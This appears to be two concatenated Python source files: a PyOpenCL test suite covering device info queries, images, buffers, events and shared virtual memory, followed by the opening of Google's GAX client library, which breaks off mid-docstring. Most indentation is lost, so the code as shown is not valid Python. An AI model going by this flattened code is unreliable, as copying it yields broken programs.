AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from six.moves import range
import numpy as np
import numpy.linalg as la
import pytest
import pyopencl as cl
import pyopencl.array as cl_array
import pyopencl.clrandom
from pyopencl.tools import ( # noqa
pytest_generate_tests_for_pyopencl as pytest_generate_tests)
# Are CL implementations crashy? You be the judge. :)
try:
import faulthandler # noqa
except ImportError:
pass
else:
faulthandler.enable()
def _skip_if_pocl(plat, msg='unsupported by pocl'):
if plat.vendor == "The pocl project":
import pytest
pytest.skip(msg)
def test_get_info(ctx_factory):
ctx = ctx_factory()
device, = ctx.devices
platform = device.platform
failure_count = [0]
pocl_quirks = [
(cl.Buffer, cl.mem_info.OFFSET),
(cl.Program, cl.program_info.BINARIES),
(cl.Program, cl.program_info.BINARY_SIZES),
]
if ctx._get_cl_version() >= (1, 2) and cl.get_cl_header_version() >= (1, 2):
pocl_quirks.extend([
(cl.Program, cl.program_info.KERNEL_NAMES),
(cl.Program, cl.program_info.NUM_KERNELS),
])
CRASH_QUIRKS = [ # noqa
(("NVIDIA Corporation", "NVIDIA CUDA",
"OpenCL 1.0 CUDA 3.0.1"),
[
(cl.Event, cl.event_info.COMMAND_QUEUE),
]),
(("NVIDIA Corporation", "NVIDIA CUDA",
"OpenCL 1.2 CUDA 7.5"),
[
(cl.Buffer, getattr(cl.mem_info, "USES_SVM_POINTER", None)),
]),
(("The pocl project", "Portable Computing Language",
"OpenCL 1.2 pocl 0.8-pre"),
pocl_quirks),
(("The pocl project", "Portable Computing Language",
"OpenCL 1.2 pocl 0.8"),
pocl_quirks),
(("The pocl project", "Portable Computing Language",
"OpenCL 1.2 pocl 0.9-pre"),
pocl_quirks),
(("The pocl project", "Portable Computing Language",
"OpenCL 1.2 pocl 0.9"),
pocl_quirks),
(("The pocl project", "Portable Computing Language",
"OpenCL 1.2 pocl 0.10-pre"),
pocl_quirks),
(("The pocl project", "Portable Computing Language",
"OpenCL 1.2 pocl 0.10"),
pocl_quirks),
(("Apple", "Apple",
"OpenCL 1.2"),
[
(cl.Program, cl.program_info.SOURCE),
]),
]
QUIRKS = [] # noqa
def find_quirk(quirk_list, cl_obj, info):
for (vendor, name, version), quirks in quirk_list:
if (
vendor == platform.vendor
and name == platform.name
and platform.version.startswith(version)):
for quirk_cls, quirk_info in quirks:
if (isinstance(cl_obj, quirk_cls)
and quirk_info == info):
return True
return False
def do_test(cl_obj, info_cls, func=None, try_attr_form=True):
if func is None:
def func(info):
cl_obj.get_info(info)
for info_name in dir(info_cls):
if not info_name.startswith("_") and info_name != "to_string":
print(info_cls, info_name)
info = getattr(info_cls, info_name)
if find_quirk(CRASH_QUIRKS, cl_obj, info):
print("not executing get_info", type(cl_obj), info_name)
print("(known crash quirk for %s)" % platform.name)
continue
try:
func(info)
                except:
                    msg = "failed get_info %s %s" % (type(cl_obj), info_name)
                    if find_quirk(QUIRKS, cl_obj, info):
                        msg += " (known quirk for %s)" % platform.name
                    else:
                        failure_count[0] += 1
                    print(msg)
if try_attr_form:
try:
getattr(cl_obj, info_name.lower())
except:
print("failed attr-based get_info", type(cl_obj), info_name)
if find_quirk(QUIRKS, cl_obj, info):
print("(known quirk for %s)" % platform.name)
else:
failure_count[0] += 1
do_test(platform, cl.platform_info)
do_test(device, cl.device_info)
do_test(ctx, cl.context_info)
    profiling = False
    props = 0
if (device.queue_properties
& cl.command_queue_properties.PROFILING_ENABLE):
profiling = True
props = cl.command_queue_properties.PROFILING_ENABLE
queue = cl.CommandQueue(ctx,
properties=props)
do_test(queue, cl.command_queue_info)
prg = cl.Program(ctx, """
__kernel void sum(__global float *a)
{ a[get_global_id(0)] *= 2; }
""").build()
do_test(prg, cl.program_info)
do_test(prg, cl.program_build_info,
lambda info: prg.get_build_info(device, info),
try_attr_form=False)
n = 2000
a_buf = cl.Buffer(ctx, 0, n*4)
do_test(a_buf, cl.mem_info)
kernel = prg.sum
do_test(kernel, cl.kernel_info)
evt = kernel(queue, (n,), None, a_buf)
do_test(evt, cl.event_info)
if profiling:
evt.wait()
do_test(evt, cl.profiling_info,
lambda info: evt.get_profiling_info(info),
try_attr_form=False)
# crashes on intel...
# and pocl does not support CL_ADDRESS_CLAMP
if device.image_support and platform.vendor not in [
"Intel(R) Corporation",
"The pocl project",
]:
smp = cl.Sampler(ctx, False,
cl.addressing_mode.CLAMP,
cl.filter_mode.NEAREST)
do_test(smp, cl.sampler_info)
img_format = cl.get_supported_image_formats(
ctx, cl.mem_flags.READ_ONLY, cl.mem_object_type.IMAGE2D)[0]
img = cl.Image(ctx, cl.mem_flags.READ_ONLY, img_format, (128, 256))
assert img.shape == (128, 256)
img.depth
img.image.depth
do_test(img, cl.image_info,
lambda info: img.get_image_info(info))
def test_int_ptr(ctx_factory):
def do_test(obj):
new_obj = type(obj).from_int_ptr(obj.int_ptr)
assert obj == new_obj
assert type(obj) is type(new_obj)
ctx = ctx_factory()
device, = ctx.devices
platform = device.platform
do_test(device)
do_test(platform)
do_test(ctx)
queue = cl.CommandQueue(ctx)
do_test(queue)
evt = cl.enqueue_marker(queue)
do_test(evt)
prg = cl.Program(ctx, """
__kernel void sum(__global float *a)
{ a[get_global_id(0)] *= 2; }
""").build()
do_test(prg)
do_test(prg.sum)
n = 2000
a_buf = cl.Buffer(ctx, 0, n*4)
do_test(a_buf)
# crashes on intel...
# and pocl does not support CL_ADDRESS_CLAMP
if device.image_support and platform.vendor not in [
"Intel(R) Corporation",
"The pocl project",
]:
smp = cl.Sampler(ctx, False,
cl.addressing_mode.CLAMP,
cl.filter_mode.NEAREST)
do_test(smp)
img_format = cl.get_supported_image_formats(
ctx, cl.mem_flags.READ_ONLY, cl.mem_object_type.IMAGE2D)[0]
img = cl.Image(ctx, cl.mem_flags.READ_ONLY, img_format, (128, 256))
do_test(img)
def test_invalid_kernel_names_cause_failures(ctx_factory):
ctx = ctx_factory()
device = ctx.devices[0]
prg = cl.Program(ctx, """
__kernel void sum(__global float *a)
{ a[get_global_id(0)] *= 2; }
""").build()
try:
prg.sam
raise RuntimeError("invalid kernel name did not cause error")
except AttributeError:
pass
except RuntimeError:
if "Intel" in device.platform.vendor:
from pytest import xfail
xfail("weird exception from OpenCL implementation "
"on invalid kernel name--are you using "
"Intel's implementation? (if so, known bug in Intel CL)")
else:
raise
def test_image_format_constructor():
# doesn't need image support to succeed
iform = cl.ImageFormat(cl.channel_order.RGBA, cl.channel_type.FLOAT)
assert iform.channel_order == cl.channel_order.RGBA
assert iform.channel_data_type == cl.channel_type.FLOAT
assert not iform.__dict__
def test_device_topology_amd_constructor():
# doesn't need cl_amd_device_attribute_query support to succeed
topol = cl.DeviceTopologyAmd(3, 4, 5)
assert topol.bus == 3
assert topol.device == 4
assert topol.function == 5
assert not topol.__dict__
def test_nonempty_supported_image_formats(ctx_factory):
context = ctx_factory()
device = context.devices[0]
if device.image_support:
assert len(cl.get_supported_image_formats(
context, cl.mem_flags.READ_ONLY, cl.mem_object_type.IMAGE2D)) > 0
else:
from pytest import skip
skip("images not supported on %s" % device.name)
def test_that_python_args_fail(ctx_factory):
context = ctx_factory()
prg = cl.Program(context, """
__kernel void mult(__global float *a, float b, int c)
{ a[get_global_id(0)] *= (b+c); }
""").build()
a = np.random.rand(50000)
queue = cl.CommandQueue(context)
mf = cl.mem_flags
a_buf = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=a)
knl = cl.Kernel(prg, "mult")
try:
knl(queue, a.shape, None, a_buf, 2, 3)
assert False, "PyOpenCL should not accept bare Python types as arguments"
except cl.LogicError:
pass
try:
prg.mult(queue, a.shape, None, a_buf, float(2), 3)
assert False, "PyOpenCL should not accept bare Python types as arguments"
except cl.LogicError:
pass
prg.mult(queue, a.shape, None, a_buf, np.float32(2), np.int32(3))
a_result = np.empty_like(a)
cl.enqueue_read_buffer(queue, a_buf, a_result).wait()
def test_image_2d(ctx_factory):
context = ctx_factory()
device, = context.devices
if not device.image_support:
from pytest import skip
skip("images not supported on %s" % device)
if "Intel" in device.vendor and "31360.31426" in device.version:
from pytest import skip
skip("images crashy on %s" % device)
_skip_if_pocl(device.platform, 'pocl does not support CL_ADDRESS_CLAMP')
prg = cl.Program(context, """
__kernel void copy_image(
__global float *dest,
__read_only image2d_t src,
sampler_t samp,
int stride0)
{
int d0 = get_global_id(0);
int d1 = get_global_id(1);
/*
const sampler_t samp =
CLK_NORMALIZED_COORDS_FALSE
| CLK_ADDRESS_CLAMP
| CLK_FILTER_NEAREST;
*/
dest[d0*stride0 + d1] = read_imagef(src, samp, (float2)(d1, d0)).x;
}
""").build()
num_channels = 1
a = np.random.rand(1024, 512, num_channels).astype(np.float32)
if num_channels == 1:
a = a[:, :, 0]
queue = cl.CommandQueue(context)
try:
a_img = cl.image_from_array(context, a, num_channels)
except cl.RuntimeError:
import sys
exc = sys.exc_info()[1]
if exc.code == cl.status_code.IMAGE_FORMAT_NOT_SUPPORTED:
from pytest import skip
skip("required image format not supported on %s" % device.name)
else:
raise
a_dest = cl.Buffer(context, cl.mem_flags.READ_WRITE, a.nbytes)
samp = cl.Sampler(context, False,
cl.addressing_mode.CLAMP,
cl.filter_mode.NEAREST)
prg.copy_image(queue, a.shape, None, a_dest, a_img, samp,
np.int32(a.strides[0]/a.dtype.itemsize))
a_result = np.empty_like(a)
cl.enqueue_copy(queue, a_result, a_dest)
good = la.norm(a_result - a) == 0
if not good:
if queue.device.type & cl.device_type.CPU:
assert good, ("The image implementation on your CPU CL platform '%s' "
"returned bad values. This is bad, but common."
% queue.device.platform)
else:
assert good
def test_image_3d(ctx_factory):
#test for image_from_array for 3d image of float2
context = ctx_factory()
device, = context.devices
if not device.image_support:
from pytest import skip
skip("images not supported on %s" % device)
if device.platform.vendor == "Intel(R) Corporation":
from pytest import skip
skip("images crashy on %s" % device)
_skip_if_pocl(device.platform, 'pocl does not support CL_ADDRESS_CLAMP')
prg = cl.Program(context, """
__kernel void copy_image_plane(
__global float2 *dest,
__read_only image3d_t src,
sampler_t samp,
int stride0,
int stride1)
{
int d0 = get_global_id(0);
int d1 = get_global_id(1);
int d2 = get_global_id(2);
/*
const sampler_t samp =
CLK_NORMALIZED_COORDS_FALSE
| CLK_ADDRESS_CLAMP
| CLK_FILTER_NEAREST;
*/
dest[d0*stride0 + d1*stride1 + d2] = read_imagef(
src, samp, (float4)(d2, d1, d0, 0)).xy;
}
""").build()
num_channels = 2
shape = (3, 4, 2)
a = np.random.random(shape + (num_channels,)).astype(np.float32)
queue = cl.CommandQueue(context)
try:
a_img = cl.image_from_array(context, a, num_channels)
except cl.RuntimeError:
import sys
exc = sys.exc_info()[1]
if exc.code == cl.status_code.IMAGE_FORMAT_NOT_SUPPORTED:
from pytest import skip
skip("required image format not supported on %s" % device.name)
else:
raise
a_dest = cl.Buffer(context, cl.mem_flags.READ_WRITE, a.nbytes)
samp = cl.Sampler(context, False,
cl.addressing_mode.CLAMP,
cl.filter_mode.NEAREST)
prg.copy_image_plane(queue, shape, None, a_dest, a_img, samp,
np.int32(a.strides[0]/a.itemsize/num_channels),
np.int32(a.strides[1]/a.itemsize/num_channels),
)
a_result = np.empty_like(a)
cl.enqueue_copy(queue, a_result, a_dest)
good = la.norm(a_result - a) == 0
if not good:
if queue.device.type & cl.device_type.CPU:
assert good, ("The image implementation on your CPU CL platform '%s' "
"returned bad values. This is bad, but common."
% queue.device.platform)
else:
assert good
def test_copy_buffer(ctx_factory):
context = ctx_factory()
queue = cl.CommandQueue(context)
mf = cl.mem_flags
a = np.random.rand(50000).astype(np.float32)
b = np.empty_like(a)
buf1 = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=a)
buf2 = cl.Buffer(context, mf.WRITE_ONLY, b.nbytes)
cl.enqueue_copy_buffer(queue, buf1, buf2).wait()
cl.enqueue_read_buffer(queue, buf2, b).wait()
assert la.norm(a - b) == 0
def test_mempool(ctx_factory):
from pyopencl.tools import MemoryPool, ImmediateAllocator
context = ctx_factory()
queue = cl.CommandQueue(context)
pool = MemoryPool(ImmediateAllocator(queue))
alloc_queue = []
e0 = 12
for e in range(e0-6, e0-4):
for i in range(100):
alloc_queue.append(pool.allocate(1 << e))
if len(alloc_queue) > 10:
alloc_queue.pop(0)
del alloc_queue
pool.stop_holding()
def test_mempool_2():
from pyopencl.tools import MemoryPool
from random import randrange
for i in range(2000):
s = randrange(1 << 31) >> randrange(32)
bin_nr = MemoryPool.bin_number(s)
asize = MemoryPool.alloc_size(bin_nr)
assert asize >= s, s
assert MemoryPool.bin_number(asize) == bin_nr, s
assert asize < asize*(1+1/8)
def test_vector_args(ctx_factory):
context = ctx_factory()
queue = cl.CommandQueue(context)
prg = cl.Program(context, """
__kernel void set_vec(float4 x, __global float4 *dest)
{ dest[get_global_id(0)] = x; }
""").build()
x = cl_array.vec.make_float4(1, 2, 3, 4)
dest = np.empty(50000, cl_array.vec.float4)
mf = cl.mem_flags
dest_buf = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=dest)
prg.set_vec(queue, dest.shape, None, x, dest_buf)
cl.enqueue_read_buffer(queue, dest_buf, dest).wait()
assert (dest == x).all()
def test_header_dep_handling(ctx_factory):
context = ctx_factory()
from os.path import exists
assert exists("empty-header.h") # if this fails, change dir to pyopencl/test
kernel_src = """
#include <empty-header.h>
kernel void zonk(global int *a)
{
*a = 5;
}
"""
import os
cl.Program(context, kernel_src).build(["-I", os.getcwd()])
cl.Program(context, kernel_src).build(["-I", os.getcwd()])
def test_context_dep_memoize(ctx_factory):
context = ctx_factory()
from pyopencl.tools import context_dependent_memoize
counter = [0]
@context_dependent_memoize
def do_something(ctx):
counter[0] += 1
do_something(context)
do_something(context)
assert counter[0] == 1
def test_can_build_binary(ctx_factory):
ctx = ctx_factory()
device, = ctx.devices
program = cl.Program(ctx, """
__kernel void simple(__global float *in, __global float *out)
{
out[get_global_id(0)] = in[get_global_id(0)];
}""")
program.build()
binary = program.get_info(cl.program_info.BINARIES)[0]
foo = cl.Program(ctx, [device], [binary])
foo.build()
def test_enqueue_barrier_marker(ctx_factory):
ctx = ctx_factory()
_skip_if_pocl(ctx.devices[0].platform, 'pocl crashes on enqueue_barrier')
queue = cl.CommandQueue(ctx)
cl.enqueue_barrier(queue)
evt1 = cl.enqueue_marker(queue)
evt2 = cl.enqueue_marker(queue, wait_for=[evt1])
cl.enqueue_barrier(queue, wait_for=[evt1, evt2])
def test_wait_for_events(ctx_factory):
ctx = ctx_factory()
queue = cl.CommandQueue(ctx)
evt1 = cl.enqueue_marker(queue)
evt2 = cl.enqueue_marker(queue)
cl.wait_for_events([evt1, evt2])
def test_unload_compiler(platform):
if (platform._get_cl_version() < (1, 2) or
cl.get_cl_header_version() < (1, 2)):
from pytest import skip
skip("clUnloadPlatformCompiler is only available in OpenCL 1.2")
_skip_if_pocl(platform, 'pocl does not support unloading compiler')
if platform.vendor == "Intel(R) Corporation":
from pytest import skip
skip("Intel proprietary driver does not support unloading compiler")
cl.unload_platform_compiler(platform)
def test_enqueue_task(ctx_factory):
ctx = ctx_factory()
queue = cl.CommandQueue(ctx)
mf = cl.mem_flags
prg = cl.Program(ctx, """
__kernel void
reverse(__global const float *in, __global float *out, int n)
{
for (int i = 0;i < n;i++) {
out[i] = in[n - 1 - i];
}
}
""").build()
knl = prg.reverse
n = 100
a = np.random.rand(n).astype(np.float32)
b = np.empty_like(a)
buf1 = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=a)
buf2 = cl.Buffer(ctx, mf.WRITE_ONLY, b.nbytes)
knl.set_args(buf1, buf2, np.int32(n))
cl.enqueue_task(queue, knl)
cl.enqueue_copy(queue, b, buf2).wait()
assert la.norm(a[::-1] - b) == 0
def test_platform_get_devices(ctx_factory):
ctx = ctx_factory()
platform = ctx.devices[0].platform
if platform.name == "Apple":
pytest.xfail("Apple doesn't understand all the values we pass "
"for dev_type")
dev_types = [cl.device_type.ACCELERATOR, cl.device_type.ALL,
cl.device_type.CPU, cl.device_type.DEFAULT, cl.device_type.GPU]
if (platform._get_cl_version() >= (1, 2) and
cl.get_cl_header_version() >= (1, 2)
and not platform.name.lower().startswith("nvidia")):
dev_types.append(cl.device_type.CUSTOM)
for dev_type in dev_types:
print(dev_type)
devs = platform.get_devices(dev_type)
if dev_type in (cl.device_type.DEFAULT,
cl.device_type.ALL,
getattr(cl.device_type, 'CUSTOM', None)):
continue
for dev in devs:
assert dev.type & dev_type == dev_type
def test_user_event(ctx_factory):
ctx = ctx_factory()
if (ctx._get_cl_version() < (1, 1) and
cl.get_cl_header_version() < (1, 1)):
from pytest import skip
skip("UserEvent is only available in OpenCL 1.1")
if ctx.devices[0].platform.name == "Portable Computing Language":
# https://github.com/pocl/pocl/issues/201
pytest.xfail("POCL's user events don't work right")
status = {}
def event_waiter1(e, key):
e.wait()
status[key] = True
def event_waiter2(e, key):
cl.wait_for_events([e])
status[key] = True
from threading import Thread
from time import sleep
evt = cl.UserEvent(ctx)
Thread(target=event_waiter1, args=(evt, 1)).start()
sleep(.05)
if status.get(1, False):
raise RuntimeError('UserEvent triggered before set_status')
evt.set_status(cl.command_execution_status.COMPLETE)
sleep(.05)
if not status.get(1, False):
raise RuntimeError('UserEvent.wait timeout')
assert evt.command_execution_status == cl.command_execution_status.COMPLETE
evt = cl.UserEvent(ctx)
Thread(target=event_waiter2, args=(evt, 2)).start()
sleep(.05)
if status.get(2, False):
raise RuntimeError('UserEvent triggered before set_status')
evt.set_status(cl.command_execution_status.COMPLETE)
sleep(.05)
if not status.get(2, False):
raise RuntimeError('cl.wait_for_events timeout on UserEvent')
assert evt.command_execution_status == cl.command_execution_status.COMPLETE
def test_buffer_get_host_array(ctx_factory):
ctx = ctx_factory()
mf = cl.mem_flags
host_buf = np.random.rand(25).astype(np.float32)
buf = cl.Buffer(ctx, mf.READ_WRITE | mf.USE_HOST_PTR, hostbuf=host_buf)
host_buf2 = buf.get_host_array(25, np.float32)
assert (host_buf == host_buf2).all()
    assert (host_buf.__array_interface__['data'][0] ==
            host_buf2.__array_interface__['data'][0])
assert host_buf2.base is buf
buf = cl.Buffer(ctx, mf.READ_WRITE | mf.ALLOC_HOST_PTR, size=100)
try:
host_buf2 = buf.get_host_array(25, np.float32)
assert False, ("MemoryObject.get_host_array should not accept buffer "
"without USE_HOST_PTR")
except cl.LogicError:
pass
host_buf = np.random.rand(25).astype(np.float32)
buf = cl.Buffer(ctx, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=host_buf)
try:
host_buf2 = buf.get_host_array(25, np.float32)
assert False, ("MemoryObject.get_host_array should not accept buffer "
"without USE_HOST_PTR")
except cl.LogicError:
pass
def test_program_valued_get_info(ctx_factory):
ctx = ctx_factory()
prg = cl.Program(ctx, """
__kernel void
reverse(__global float *out)
{
out[get_global_id(0)] *= 2;
}
""").build()
knl = prg.reverse
assert knl.program == prg
knl.program.binaries[0]
def test_event_set_callback(ctx_factory):
import sys
if sys.platform.startswith("win"):
pytest.xfail("Event.set_callback not present on Windows")
ctx = ctx_factory()
queue = cl.CommandQueue(ctx)
if ctx._get_cl_version() < (1, 1):
pytest.skip("OpenCL 1.1 or newer required fro set_callback")
a_np = np.random.rand(50000).astype(np.float32)
b_np = np.random.rand(50000).astype(np.float32)
got_called = []
def cb(status):
got_called.append(status)
mf = cl.mem_flags
a_g = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=a_np)
b_g = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=b_np)
prg = cl.Program(ctx, """
__kernel void sum(__global const float *a_g, __global const float *b_g,
__global float *res_g) {
int gid = get_global_id(0);
res_g[gid] = a_g[gid] + b_g[gid];
}
""").build()
res_g = cl.Buffer(ctx, mf.WRITE_ONLY, a_np.nbytes)
uevt = cl.UserEvent(ctx)
evt = prg.sum(queue, a_np.shape, None, a_g, b_g, res_g, wait_for=[uevt])
evt.set_callback(cl.command_execution_status.COMPLETE, cb)
uevt.set_status(cl.command_execution_status.COMPLETE)
queue.finish()
# yuck
from time import sleep
sleep(0.1)
assert got_called
def test_global_offset(ctx_factory):
context = ctx_factory()
queue = cl.CommandQueue(context)
prg = cl.Program(context, """
__kernel void mult(__global float *a)
{ a[get_global_id(0)] *= 2; }
""").build()
n = 50
a = np.random.rand(n).astype(np.float32)
queue = cl.CommandQueue(context)
mf = cl.mem_flags
a_buf = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=a)
step = 10
for ofs in range(0, n, step):
prg.mult(queue, (step,), None, a_buf, global_offset=(ofs,))
a_2 = np.empty_like(a)
cl.enqueue_copy(queue, a_2, a_buf)
assert (a_2 == 2*a).all()
def test_sub_buffers(ctx_factory):
ctx = ctx_factory()
if (ctx._get_cl_version() < (1, 1) or
cl.get_cl_header_version() < (1, 1)):
from pytest import skip
skip("sub-buffers are only available in OpenCL 1.1")
alignment = ctx.devices[0].mem_base_addr_align
queue = cl.CommandQueue(ctx)
n = 30000
a = (np.random.rand(n) * 100).astype(np.uint8)
mf = cl.mem_flags
a_buf = cl.Buffer(ctx, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=a)
start = (5000 // alignment) * alignment
stop = start + 20 * alignment
a_sub_ref = a[start:stop]
a_sub = np.empty_like(a_sub_ref)
cl.enqueue_copy(queue, a_sub, a_buf[start:stop])
assert np.array_equal(a_sub, a_sub_ref)
def test_spirv(ctx_factory):
ctx = ctx_factory()
queue = cl.CommandQueue(ctx)
if (ctx._get_cl_version() < (2, 1) or
cl.get_cl_header_version() < (2, 1)):
from pytest import skip
skip("SPIR-V program creation only available in OpenCL 2.1 and higher")
n = 50000
a_dev = cl.clrandom.rand(queue, n, np.float32)
b_dev = cl.clrandom.rand(queue, n, np.float32)
dest_dev = cl_array.empty_like(a_dev)
with open("add-vectors.spv", "rb") as spv_file:
spv = spv_file.read()
prg = cl.Program(ctx, spv)
prg.sum(queue, a_dev.shape, None, a_dev.data, b_dev.data, dest_dev.data)
assert la.norm((dest_dev - (a_dev+b_dev)).get()) < 1e-7
def test_coarse_grain_svm(ctx_factory):
import sys
is_pypy = '__pypy__' in sys.builtin_module_names
ctx = ctx_factory()
queue = cl.CommandQueue(ctx)
if (ctx._get_cl_version() < (2, 0) or
cl.get_cl_header_version() < (2, 0)):
from pytest import skip
skip("SVM only available in OpenCL 2.0 and higher")
dev = ctx.devices[0]
if ("AMD" in dev.platform.name
and dev.type & cl.device_type.CPU):
pytest.xfail("AMD CPU doesn't do coarse-grain SVM")
n = 3000
svm_ary = cl.SVM(cl.csvm_empty(ctx, (n,), np.float32, alignment=64))
if not is_pypy:
# https://bitbucket.org/pypy/numpy/issues/52
assert isinstance(svm_ary.mem.base, cl.SVMAllocation)
if dev.platform.name != "Portable Computing Language":
# pocl 0.13 has a bug misinterpreting the size parameter
cl.enqueue_svm_memfill(queue, svm_ary, np.zeros((), svm_ary.mem.dtype))
with svm_ary.map_rw(queue) as ary:
ary.fill(17)
orig_ary = ary.copy()
prg = cl.Program(ctx, """
__kernel void twice(__global float *a_g)
{
a_g[get_global_id(0)] *= 2;
}
""").build()
prg.twice(queue, svm_ary.mem.shape, None, svm_ary)
with svm_ary.map_ro(queue) as ary:
print(ary)
assert np.array_equal(orig_ary*2, ary)
new_ary = np.empty_like(orig_ary)
new_ary.fill(-1)
if ctx.devices[0].platform.name != "Portable Computing Language":
# "Blocking memcpy is unimplemented (clEnqueueSVMMemcpy.c:61)"
# in pocl 0.13.
cl.enqueue_copy(queue, new_ary, svm_ary)
assert np.array_equal(orig_ary*2, new_ary)
def test_fine_grain_svm(ctx_factory):
import sys
is_pypy = '__pypy__' in sys.builtin_module_names
ctx = ctx_factory()
queue = cl.CommandQueue(ctx)
from pytest import skip
if (ctx._get_cl_version() < (2, 0) or
cl.get_cl_header_version() < (2, 0)):
skip("SVM only available in OpenCL 2.0 and higher")
if not (ctx.devices[0].svm_capabilities
& cl.device_svm_capabilities.FINE_GRAIN_BUFFER):
skip("device does not support fine-grain SVM")
n = 3000
ary = cl.fsvm_empty(ctx, n, np.float32, alignment=64)
if not is_pypy:
# https://bitbucket.org/pypy/numpy/issues/52
assert isinstance(ary.base, cl.SVMAllocation)
ary.fill(17)
orig_ary = ary.copy()
prg = cl.Program(ctx, """
__kernel void twice(__global float *a_g)
{
a_g[get_global_id(0)] *= 2;
}
""").build()
prg.twice(queue, ary.shape, None, cl.SVM(ary))
queue.finish()
print(ary)
assert np.array_equal(orig_ary*2, ary)
if __name__ == "__main__":
# make sure that import failures get reported, instead of skipping the tests.
import pyopencl # noqa
import sys
if len(sys.argv) > 1:
exec(sys.argv[1])
else:
from py.test.cmdline import main
main([__file__])
|
__init__.py
|
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Google API Extensions"""
from __future__ import absolute_import
import collections
import logging
import multiprocessing as mp
import dill
from grpc import RpcError, StatusCode
from google.rpc import code_pb2
from google.gax.errors import GaxError
from google.gax.retry import retryable
__version__ = '0.15.1'
_LOG = logging.getLogger(__name__)
_LOG.addHandler(logging.NullHandler())
_MILLIS_PER_SEC = 1000
INITIAL_PAGE = object()
"""A placeholder for the page token passed into an initial paginated request."""
OPTION_INHERIT = object()
"""Global constant.
If a CallOptions field is set to OPTION_INHERIT, the call to which that
CallOptions belongs will attempt to inherit that field from its default
settings."""
class _CallSettings(object):
"""Encapsulates the call settings for an API call."""
# pylint: disable=too-few-public-methods
def __init__(self, timeout=30, retry=None, page_descriptor=None,
page_token=None, bundler=None, bundle_descriptor=None,
kwargs=None):
"""Constructor.
Args:
timeout (int): The client-side timeout for API calls. This
parameter is ignored for retrying calls.
retry (:class:`RetryOptions`): The configuration for retrying upon
transient error. If set to None, this call will not retry.
page_descriptor (:class:`PageDescriptor`): indicates the structure
of page streaming to be performed. If set to None, page streaming
is disabled.
page_token (str): If there is no ``page_descriptor``, this attribute
has no meaning. Otherwise, determines the page token used in the
page streaming request.
bundler (:class:`gax.bundling.Executor`): orchestrates bundling. If
None, bundling is not performed.
          bundle_descriptor (:class:`BundleDescriptor`): indicates the
            structure of the bundle. If None, bundling is disabled.
kwargs (dict): other keyword arguments to be passed to the API
calls.
"""
self.timeout = timeout
self.retry = retry
self.page_descriptor = page_descriptor
self.page_token = page_token
self.bundler = bundler
self.bundle_descriptor = bundle_descriptor
self.kwargs = kwargs or {}
@property
def flatten_pages(self):
"""
A boolean property indicating whether a page streamed response should
make the page structure transparent to the user by flattening the
repeated field in the returned iterator.
        If there is no ``page_descriptor``, this property has no meaning.
"""
return self.page_token is None
def merge(self, options):
"""Returns new _CallSettings merged from this and a CallOptions object.
        Note that if the CallOptions instance specifies a page_token, the
        merged _CallSettings will have ``flatten_pages`` disabled. This
        permits toggling per-resource/per-page page streaming.
Args:
options (:class:`CallOptions`): an instance whose values override
those in this object. If None, ``merge`` returns a copy of this
object
Returns:
A :class:`_CallSettings` object.
"""
if not options:
return _CallSettings(
timeout=self.timeout, retry=self.retry,
page_descriptor=self.page_descriptor,
page_token=self.page_token,
bundler=self.bundler, bundle_descriptor=self.bundle_descriptor,
kwargs=self.kwargs)
else:
if options.timeout == OPTION_INHERIT:
timeout = self.timeout
else:
timeout = options.timeout
if options.retry == OPTION_INHERIT:
retry = self.retry
else:
retry = options.retry
if options.page_token == OPTION_INHERIT:
page_token = self.page_token
else:
page_token = options.page_token
if options.is_bundling:
bundler = self.bundler
else:
bundler = None
if options.kwargs == OPTION_INHERIT:
kwargs = self.kwargs
else:
kwargs = self.kwargs.copy()
kwargs.update(options.kwargs)
return _CallSettings(
timeout=timeout, retry=retry,
page_descriptor=self.page_descriptor, page_token=page_token,
bundler=bundler, bundle_descriptor=self.bundle_descriptor,
kwargs=kwargs)
class CallOptions(object):
"""Encapsulates the overridable settings for a particular API call.
``CallOptions`` is an optional arg for all GAX API calls. It is used to
configure the settings of a specific API call.
When provided, its values override the GAX service defaults for that
